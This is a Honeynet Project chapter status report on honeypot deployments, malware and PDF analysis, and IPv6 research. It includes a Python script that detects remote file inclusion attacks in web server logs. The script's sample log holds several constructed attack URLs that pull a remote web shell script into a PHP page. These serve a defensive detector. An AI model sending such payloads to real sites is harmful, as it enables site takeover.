The Honeynet Project Mexican Chapter - Status Report 2010/2011

ORGANIZATION

New structure:
Hugo Gonzalez - Full Member, Chapter Leader
Miguel Lopez

New contributors:
Francisco Ordaz
Rafael Llamas
Armín García

The Chapter members are interested in research projects covering the following topics:

1. Low-interaction/high-interaction client honeypots
2. Distributed honeynet deployment, operation and data analysis
3. Automated malware collection and analysis systems

DEPLOYMENTS

* Several boxes running dionaea.
* Skynet on the Latin American domains.
* Parsing production web server logs for RFI (remote file inclusion) attacks.
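The RFI log parsing mentioned above, written out as an added example (not the Chapter's own tool): it reads Apache/nginx combined-format access log lines, flags any query parameter whose value is an absolute URL pointing outside the site's own hostnames, and counts the requesting IP separately from the host serving the included payload, since those are two different parties. The log lines, the LOCAL_HOSTS set and the IP addresses are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlparse

# Apache/nginx "combined" log format; referer and user-agent are ignored here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Hostnames the application legitimately references in parameters (assumed for the example).
LOCAL_HOSTS = {"example.org", "www.example.org"}

# Constructed sample log: two RFI attempts from the same client (one percent-encoded),
# one normal request and one legitimate redirect to the site's own host.
LOG_SAMPLE = """\
203.0.113.7 - - [12/Mar/2011:10:15:02 -0600] "GET /index.php?page=http://198.51.100.23/r57.txt? HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
198.51.100.88 - - [12/Mar/2011:10:15:04 -0600] "GET /index.php?page=about HTTP/1.1" 200 2312 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2011:10:16:41 -0600] "GET /modules/foo.php?config[path]=http%3A%2F%2F198.51.100.23%2Fid.txt%3F HTTP/1.1" 404 512 "-" "libwww-perl/5.8"
192.0.2.9 - - [12/Mar/2011:10:17:00 -0600] "GET /go.php?url=http://www.example.org/help HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi(entry):
    """Return (param, url) pairs for query parameters carrying a remote absolute URL.

    parse_qsl decodes percent-encoding, so "http%3A%2F%2F..." is caught as well.
    The trailing "?" attackers usually append is kept as part of the URL.
    """
    _, _, query = entry["path"].partition("?")
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        u = urlparse(value)
        if u.scheme in ("http", "https", "ftp") and u.hostname and u.hostname not in LOCAL_HOSTS:
            hits.append((name, value))
    return hits


def scan(log_text):
    """Run the RFI check over every line; keep the attacker IP and the payload host apart."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        for param, url in find_rfi(entry):
            findings.append({
                "attacker": entry["ip"],            # who sent the request
                "param": param,                     # which parameter was abused
                "host": urlparse(url).hostname,     # who serves the include payload
                "url": url,
                "status": int(entry["status"]),     # 200 here does not prove the include ran
            })
    return findings


def summarize(findings):
    """Counts per requesting IP and per payload-hosting server, as two separate Counters."""
    return (Counter(f["attacker"] for f in findings),
            Counter(f["host"] for f in findings))


if __name__ == "__main__":
    hits = scan(LOG_SAMPLE)
    for h in hits:
        print(f'{h["attacker"]} abused {h["param"]} with {h["url"]} '
              f'(payload host {h["host"]}, status {h["status"]})')
    attackers, hosts = summarize(hits)
    print("requesting IPs:", dict(attackers))
    print("payload hosts:", dict(hosts))
```

The response status is recorded but not treated as proof of success: a 200 only means the script ran, not that it fetched and executed the remote file. The host extracted from the include URL is the one to retrieve the payload from for analysis, while the requesting IP is the candidate for the "is the attacker a web server?" question.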

RESEARCH AND DEVELOPMENT

* Working on malicious PDF analysis (Mahmud has been advising us).
We will release a lightweight web-based PDF analysis service, based only on the characteristics of the PDF file plus some AI techniques.

* Testing Cuckoo Sandbox; we will soon release detailed Spanish documentation on its installation and configuration.

* IPv6 (in)security.

* Working on a "massive password analysis framework" (we could use it on the passwords tried in SSH attacks, for example to tell whether attackers use the same wordlists or customized ones).

* Web interface for visualizing the RFI analysis (Jose Narario is sharing a lot of RFI data with us).

FINDINGS

The hosts launching RFI attacks are not always web servers, as we had assumed.

PAPERS AND PRESENTATIONS

*Does a virus work on an IPv6-only network?
Summer research 2010 at UPSLP.

*Characteristics of a malicious PDF file.
CIBSI 2011

*Hands-on lab on structured network analysis.
BugCon Security Conferences 2010.

GOALS

*Improve our capabilities in malware analysis.
*Begin analyzing Android malware.
*Implement an easy way to interpret Cuckoo reports.
*Implement an easy way to submit samples to Cuckoo, such as a web interface.
*Contribute to the Cuckoo Sandbox project.
*Contribute to the dionaea project.
*Cooperate with other chapters.
*Run a forensics challenge on IPv6.

MISC ACTIVITIES

Helped with forensics challenges 1 and 7.
Participated in the annual committee.
Worked on information security education campaigns.